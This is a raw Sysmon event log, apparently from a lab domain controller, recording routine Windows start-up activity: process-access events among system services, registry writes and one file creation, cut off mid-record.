10341000x80000000000000001077Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001076Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.790{10ACEC4A-853E-5FCF-0A00-000000009101}8521192C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001075Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.774{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001074Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.774{10ACEC4A-853E-5FCF-0A00-000000009101}8521136C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001073Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.774{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001072Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.774{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001071Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.774{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x0000054b) 10341000x80000000000000001070Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.774{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001069Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.758{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x80000000000000001068Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.727{10ACEC4A-8541-5FCF-1200-000000009101}12122032C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001067Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.727{10ACEC4A-8541-5FCF-1200-000000009101}12122032C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001066Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.711{10ACEC4A-8541-5FCF-1000-000000009101}11561820C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001065Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.680{10ACEC4A-8541-5FCF-1200-000000009101}12122032C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001064Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.680{10ACEC4A-8541-5FCF-1200-000000009101}12122032C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001063Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.680{10ACEC4A-8541-5FCF-1200-000000009101}12122032C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001062Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.665{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Schedule\FailureActionsBinary Data 10341000x80000000000000001061Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.665{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001060Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.665{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001059Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.665{10ACEC4A-8541-5FCF-1000-000000009101}11562276C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001058Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.649{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001057Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.649{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001056Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.586{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exeC:\Windows\System32\wbem\Repository\WRITABLE.TST2020-12-08 13:53:05.586 10341000x80000000000000001055Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.571{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001054Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.571{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001053Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.540{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\tunnel\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001052Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.540{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\tunnel\DriverMajorVersionDWORD (0x00000001) 13241300x80000000000000001051Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.540{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\tunnel\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001050Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.540{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\tunnel\NdisMajorVersionDWORD (0x00000006) 13241300x80000000000000001049Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.524{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001048Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.524{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\CountDWORD (0x00000001) 13241300x80000000000000001047Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.524{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\0SWD\IP_TUNNEL_VBUS\ISATAP_1 10341000x80000000000000001046Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.524{10ACEC4A-8541-5FCF-1200-000000009101}12121988C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001045Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.508{10ACEC4A-853E-5FCF-0B00-000000009101}8641112C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001044Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.508{10ACEC4A-853E-5FCF-0B00-000000009101}8641112C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001043Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.477{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2208C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001042Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.477{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-1B00-000000009101}2200C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001041Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.477{10ACEC4A-8541-5FCF-1000-000000009101}11561472C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2208C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001040Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 